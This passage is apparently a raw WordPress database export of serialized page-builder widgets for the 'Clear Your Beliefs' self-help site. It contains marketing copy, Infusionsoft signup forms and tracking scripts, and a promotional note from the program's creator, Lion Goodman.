Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1195, 1677, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:225:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:646:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -8px; margin-bottom: -27px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:30px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -12px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:945:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 12px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:841:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<p style="text-align: center; margin-top: 15px;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly, &#038;\nLimit Your True Magnificence</center>\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1197, 1679, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:224:"<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="641" height="155" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:446:"<center style="margin-top: -108px;"><div style="background-image:url(''http://clearyourbeliefs.com/wp-content/uploads/2014/10/v-shadow-2.png''); repeat: no-repeat; width:730px; height:411px; padding-top:16px; margin-top: 123px;">\n<iframe src="//player.vimeo.com/video/109282065?autoplay=1" width="730" height="411" frameborder="0" webkitallowfullscreen mozallowfullscreen allowfullscreen style="margin-top: -43px;"></iframe></iframe></div></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:646:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n<center style="margin-left: 41px; margin-top: -8px; margin-bottom: -27px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p style="text-align: center; margin-top:30px; margin-bottom:0px;">Download the free eBook.</p>\n<center style="margin-top: -5px;">\n<div style="margin-left: -15px; margin-bottom: -12px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/54657fac17ff5d88bb7ea5db95ab4742"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:945:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-left: 35px; margin-top: 12px; margin-bottom: -27px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-new-FINAL-large-with-font.jpg" alt="download" width="89" height="87" /></center>\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: 8px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/95b50364c9028abe58d1cf438ba1ed6c"></script></div>\n\n\n<div style="margin-left: -12px; margin-bottom: -28px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/4d653090e9a0295e74e12ab5dff702ae"></script></div>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:646:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; margin-top: -30px; width: 118%; margin-left: -21px;"><img style="margin-top: -2px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website.png"></div>\n<p style="text-align: center; margin-top: 15px; font-size: 18px;"><big><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></big></p>\n\n<div style="margin-left: -15px; margin-bottom: -38px;"><script type="text/javascript" src="https://beliefcloset.infusionsoft.com/app/form/iframe/af866427c80f3c42fbfe2df24442de38"></script></div>\n</center> [/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2813:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li> <em>What do I want to experience?</em></li>\n	<li><em>What belief is creating this experience I don''t want?</em></li>\n	<li><em>How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:6:"visual";s:5:"title";s:0:"";s:4:"text";s:502:"<div id="divStroke2"><h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;">[su_button url="http://clearbeliefs.com/" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p></div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:8:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}i:7;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:10:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}i:9;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"7";}}}'),
(1370, 1816, 'panels_data', 'a:3:{s:7:"widgets";a:8:{i:0;a:6:{s:3:"url";s:68:"http://clearyourbeliefs.com/wp-content/uploads/2014/11/307601254.mp4";s:6:"poster";s:0:"";s:4:"skin";s:10:"siteorigin";s:5:"ratio";s:5:"1.777";s:8:"autoplay";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Video";}}i:1;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1369:"<div class="three-container">[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]<center><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center><p class="tri-panel-p tri-panel-1st-p"><strong>Download the free eBook.</strong><form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free  Clear Your Beliefs eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label><input id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" required="" type="text" /></div><div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label><input id="inf_field_Email" class="form-input" name="inf_field_Email" required="" type="text" /></div><div class="form-input-container-button">	<input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1827:"<div class="three-container">[su_box title="Free App" class=''three-container box_color="#1a2d8c" radius="8"]<center><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" /></center><p class="tri-panel-p tri-panel-2nd-p-1"><strong>DOWNLOAD the FREE APP</strong><p class="tri-panel-p tri-panel-2nd-p-2">Start Clearing Whatever Is In The Way Right Now!<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click  Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPHONE APP" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<form class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/4d653090e9a0295e74e12ab5dff702ae" method="POST"><input name="inf_form_xid" type="hidden" value="4d653090e9a0295e74e12ab5dff702ae" /><input name="inf_form_name" type="hidden" value="Click  Download iPAD APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="DOWNLOAD iPAD APP" /></div></form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"1";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1170:"<div class="three-container">\n	[su_box title="Complete Program" class=''three-container'' box_color="#1a2d8c" radius="8"]<img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="" /><p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 51px; font-size: 16px;"><big><strong>Clear Your Limiting and Negative Beliefs</strong></big> – <big><strong>Permanently!</strong></big><form class="infusion-form rd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit &quot;Learn More&quot;" />\n<input name="infusionsoft_version" type="hidden" value="1.35.0.43" /><div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div></form>	<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]</div>";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"2";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1394:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;"><h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2><p>[su_row][su_column size="1/2"]</p><ul style="margin-left: 25px;"><li>Release pain and hurts from the past</li><li>Open to deeper, more profound love</li><li>Recognize your true spiritual nature</li><li>Become more calm and less reactive</li><li>Rediscover the source of your personal power</li></ul><p>[/su_column][su_column size="1/2"]</p><ul><li>Clear whatever stops you from taking action</li><li>Open yourself to new possibilities of success</li><li>Eliminate blocks and barriers easily</li><li>Discover your true purpose</li><li>Express your true magnificence</li></ul><p>[/su_column][/su_row]</p><h2>How and Why It Works So Well</h2><ul style="margin-left: 26px;"><li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li><li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li><li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li><li>You''re in charge – you decide what you want to believe, and how far you want to go.</li><li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li><li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li></ul></div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2845:"<div id="divStroke"><h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2><p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p><p>I’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of 